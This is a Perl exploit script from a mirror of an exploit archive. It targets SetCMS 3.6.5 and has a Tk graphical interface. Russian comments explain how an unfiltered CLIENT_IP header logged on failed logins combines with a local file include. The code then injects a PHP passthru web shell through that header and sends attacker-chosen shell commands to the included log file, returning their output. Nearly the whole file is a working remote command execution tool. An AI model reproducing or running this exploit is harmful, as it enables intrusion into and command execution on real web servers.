bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/php/webapps/4962.pl
Offensive Security fffbf04102 Updated
2013-12-03 19:44:07 +00:00

321 lines
6.8 KiB
Perl
Executable file
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

#!/usr/bin/perl
## SetCMS v3.6.5 (setcms.org) remote commands execution exploit by RST/GHC
## o4.o9.2oo6
## (c)oded by 1dt.w0lf
## THIS IS UNPUBLISHED RST/GHC EXPLOIT CODE
## KEEP IT PRIVATE
## про багу:
##
## file: functions.php
##
## FUNCTION ip(){
## global $user_id;
## if(getenv('HTTP_CLIENT_IP')) {$user_ip = getenv('HTTP_CLIENT_IP');}
## elseif(getenv('HTTP_X_FORWARDED_FOR')){$user_ip = getenv('HTTP_X_FORWARDED_FOR');}
## elseif(getenv('REMOTE_ADDR')) {$user_ip = getenv('REMOTE_ADDR');}
## else{$user_ip='unknown';}
## if(15 < strlen($user_ip))
## {
## $ar = split(', ', $user_ip);
## for($i=0; $i < sizeof($ar); $i++)
## {
## if($ar[$i]!='' and !ereg('[a-zA-Z]', $ar[$i])){$user_ip = $ar[$i]; break; }
## if($i==sizeof($user_ip_pass)-1){$user_ip = 'unknown';}
## }
## }
## if(ereg('unknown', $user_ip) and $user_id!=''){ $user_ip .= $user_id; }
## return $user_ip;
## }
##
## таким образом заголовки HTTP не фильтруются и можно передать необходимые данные в CLIENT_IP или X_FORWARDED_FOR
## ... далее
##
## file: modules/users/index.php
##
## if ($mc == "enter" && (!isset($do) || $do == ""))
## {
## ...
## if ($enter == "0")
## {
## $fp = fopen("files/enter.set", "a+");
## flock($fp, LOCK_EX);
## fwrite($fp, "$date::".regreplace($_POST['login'])."::".regreplace($_POST['pass'])."::$ip::\r\n");
## flock($fp, LOCK_UN);
## fclose($fp);
## $text.= "<center>Неправильное сочетание имени пользователя и пароля. Информация о вашей попытке входа записана в лог-файл.</center>";
##
## При неудачной попытке входа, отправленные данные записываются в файл files/enter.set, включая $ip =)
##
## И заканчивая
##
## file: index.php
##
## $set = $_GET['set'];
## ...
## //urls
## if (file_exists("modules/$set/index.php"))
## {
## if(file_exists("modules/$set/config.php")){include("modules/$set/config.php");}
## include("modules/$set/index.php");
## }
##
## Локальный инклуд налицо =)
## index.php?set=../files/enter.set%00
## Правда при условии magic = off
##
## eof
use Tk;
use Tk::Menu;
use LWP::UserAgent;
use Tk::DialogBox;
$top = MainWindow->new();
$top->resizable(0,0);
$path = 'http://server/setcms/index.php';
$cmd = 'id; uname -a; ls -la';
$xpl = LWP::UserAgent->new() or die;
$top->title("r57setcms365");
Dialog2::ui($top);
Dialog2::run() if defined &Dialog2::run;
Tk::MainLoop();
sub Dialog2::ui {
our($root) = @_;
# Widget Initialization
$_entry_1 = $root->Entry(
-font => 'Verdana 8',
-relief => "groove",
-textvariable => \$path,
-width => 0,
);
$_entry_2 = $root->Entry(
-font => 'Verdana 8',
-relief => "groove",
-textvariable => \$cmd,
-width => 0,
);
our($_label_1) = $root->Label(
-font => 'Verdana 8',
-text => "Path to index.php : ",
);
our($_label_2) = $root->Label(
-font => 'Verdana 8',
-text => "Command for execute : ",
);
our($_label_3) = $root->Label(
-font => 'Verdana 8',
-text => " >>> SetCMS 3.6.5 RCE sploit by RST/GHC",
);
our($_button_1) = $root->Button(
-font => 'Verdana 8 bold',
-relief => "groove",
-text => "Execute command",
);
our($_button_2) = $root->Button(
-font => 'Verdana 8 bold',
-relief => "groove",
-text => "Create shell",
);
$_text_1 = $root->Text(
-font => 'Verdana 8',
-height => 0,
-relief => "groove",
-width => 0,
);
our($_label_4) = $root->Label(
-font => 'Verdana 8',
-text => " (c)oded by 1dt.w0lf , RST/GHC , o4/o9/2oo6 , priv8",
);
# widget commands
$_button_1->configure(
-command => \&execute
);
$_button_2->configure(
-command => \&create_shell
);
# Geometry Management
$_entry_1->grid(
-in => $root,
-column => 2,
-row => 2,
-columnspan => 2,
-ipadx => 0,
-ipady => 0,
-padx => 4,
-pady => 4,
-rowspan => 1,
-sticky => "ew"
);
$_entry_2->grid(
-in => $root,
-column => 2,
-row => 3,
-columnspan => 2,
-ipadx => 0,
-ipady => 0,
-padx => 4,
-pady => 4,
-rowspan => 1,
-sticky => "ew"
);
$_label_1->grid(
-in => $root,
-column => 1,
-row => 2,
-columnspan => 1,
-ipadx => 0,
-ipady => 0,
-padx => 0,
-pady => 0,
-rowspan => 1,
-sticky => "e"
);
$_label_2->grid(
-in => $root,
-column => 1,
-row => 3,
-columnspan => 1,
-ipadx => 0,
-ipady => 0,
-padx => 0,
-pady => 0,
-rowspan => 1,
-sticky => "e"
);
$_label_3->grid(
-in => $root,
-column => 1,
-row => 1,
-columnspan => 3,
-ipadx => 0,
-ipady => 0,
-padx => 0,
-pady => 0,
-rowspan => 1,
-sticky => "w"
);
$_button_1->grid(
-in => $root,
-column => 3,
-row => 4,
-columnspan => 1,
-ipadx => 0,
-ipady => 0,
-padx => 4,
-pady => 4,
-rowspan => 1,
-sticky => ""
);
$_button_2->grid(
-in => $root,
-column => 2,
-row => 4,
-columnspan => 1,
-ipadx => 0,
-ipady => 0,
-padx => 4,
-pady => 4,
-rowspan => 1,
-sticky => "e"
);
$_text_1->grid(
-in => $root,
-column => 1,
-row => 5,
-columnspan => 3,
-ipadx => 0,
-ipady => 0,
-padx => 5,
-pady => 5,
-rowspan => 1,
-sticky => "news"
);
$_label_4->grid(
-in => $root,
-column => 1,
-row => 6,
-columnspan => 2,
-ipadx => 0,
-ipady => 0,
-padx => 0,
-pady => 0,
-rowspan => 1,
-sticky => "w"
);
# Resize Behavior
$root->gridRowconfigure(1, -weight => 0, -minsize => 6, -pad => 0);
$root->gridRowconfigure(2, -weight => 0, -minsize => 2, -pad => 0);
$root->gridRowconfigure(3, -weight => 0, -minsize => 2, -pad => 0);
$root->gridRowconfigure(4, -weight => 0, -minsize => 2, -pad => 0);
$root->gridRowconfigure(5, -weight => 0, -minsize => 361, -pad => 0);
$root->gridRowconfigure(6, -weight => 0, -minsize => 21, -pad => 0);
$root->gridColumnconfigure(1, -weight => 0, -minsize => 110, -pad => 0);
$root->gridColumnconfigure(2, -weight => 0, -minsize => 291, -pad => 0);
$root->gridColumnconfigure(3, -weight => 0, -minsize => 2, -pad => 0);
}
sub create_shell()
{
$_text_1->delete("0.0",'end');
$already = 0;
$res = $xpl->get($path."?set=../files/enter.set%00");
if(!$res->is_success) { &connect_error(); }
else
{
if($res->content =~ /pes_barbos/) { $already = 1; }
}
if($already) { $_text_1->insert('end', "[!] Shell already created\n"); }
else {
$res = $xpl->post($path."?set=users&mc=enter",
[
'login' => 'pes_barbos',
'pass' => 'pes_barbos',
],
'CLIENT_IP' => '86.12.56.33 <? if(isset($_POST[\'RSTGHC\'])){ echo "R57SETCMSXPL"; passthru($_POST[\'RSTGHC\']); echo "R57SETCMSXPL"; } ?>',
);
if(!$res->is_success) { &connect_error(); }
else
{
$_text_1->insert('end', "[+] Shell created!\n[+] Now you can execute commands!\n");
}
}
}
sub execute()
{
$_text_1->delete("0.0",'end');
$_text_1->insert('end',"[~] Try execute command\n");
$res = $xpl->post($path."?set=../files/enter.set%00",['RSTGHC'=>$cmd]);
if(!$res->is_success) { &connect_error(); }
else
{
@rez = split("R57SETCMSXPL",$res->content);
$_text_1->insert('end',@rez[1]);
$_text_1->insert('end',"[+] EOF\n");
}
}
sub connect_error()
{
$_text_1->insert('end', "[-] Error: ".$res->status_line."\n");
}
1;
# milw0rm.com [2008-01-22]
Reference in a new issue View git blame Copy permalink